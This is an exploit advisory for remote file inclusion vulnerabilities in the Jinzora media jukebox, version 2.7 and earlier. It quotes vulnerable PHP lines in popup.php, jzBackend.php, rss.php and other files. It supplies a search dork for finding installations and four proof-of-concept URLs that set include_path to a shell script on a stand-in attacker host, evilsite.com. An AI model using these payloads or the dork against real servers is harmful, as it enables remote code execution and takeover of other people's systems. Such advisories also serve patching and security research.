±------------------------------------------------------------------------------------------
- Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities
±------------------------------------------------------------------------------------------
- Vendor …: http://www.jinzora.com/
- Affected Software .: Jinzora <= 2.7
- Download …: http://www.jinzora.com/downloads/j2.7.tar.gz
- Description …: "Jinzora enables you to stream your digital music and videos to any internet connected computer using a web browser"
- Dork …: "Jinzora Media Jukebox"
- Class …: Remote File Inclusion
- Risk …: High (Remote File Execution)
- Found By …: nuffsaid <nuffsaid[at]newbslove.us>
±------------------------------------------------------------------------------------------
- Details:
- Jinzora has several scripts which do not initialize variables before using them to include
- files, assuming register_globals = on, we can initialize any one of the variables in a query
- string and include a remote file of our choice.
- Vulnerable Code:
- popup.php, line(s) 01-27:
- -> 01: <?php define('JZ_SECURE_ACCESS','true');
- -> 27: include_once('jzBackend.php'); //jzBackend.php is being included before the include_path var is set
- jzBackend.php, line(s) 40-77:
- -> 01: <?php if (!defined(JZ_SECURE_ACCESS)) die ('Security breach detected.');
- -> 40: @include($include_path."settings.php"); //assumes the include_path var has been set
- -> 77: include($css);
- rss.php, line(s) 01-35:
- -> 01: <?php define('JZ_SECURE_ACCESS','true');
- -> 35: include_once('backend/backend.php');
- backend/backend.php, line(s) 02-42:
- -> 02: if (!defined(JZ_SECURE_ACCESS)) die ('Security breach detected.');
- -> 42: include_once($include_path. 'system.php'); //assumes the include_path var has been set
- ajax_request.php, line(s) 01-32:
- -> 01: <?php define('JZ_SECURE_ACCESS','true');
- -> 32: require_once('jzBackend.php'); //see jzBackend.php above for vulnerable code
- mediabroadcast.php, line(s) 01-42:
- -> 01: <?php define('JZ_SECURE_ACCESS','true');
- -> 42: include_once('backend/backend.php'); //see above for vulnerable code
- Proof Of Concept:
- http://[target]/[path]/popup.php?include_path=http://evilsite.com/shell.php?
- http://[target]/[path]/rss.php?include_path=http://evilsite.com/shell.php?
- http://[target]/[path]/ajax_request.php?include_path=http://evilsite.com/shell.php?
- http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php?
±------------------------------------------------------------------------------------------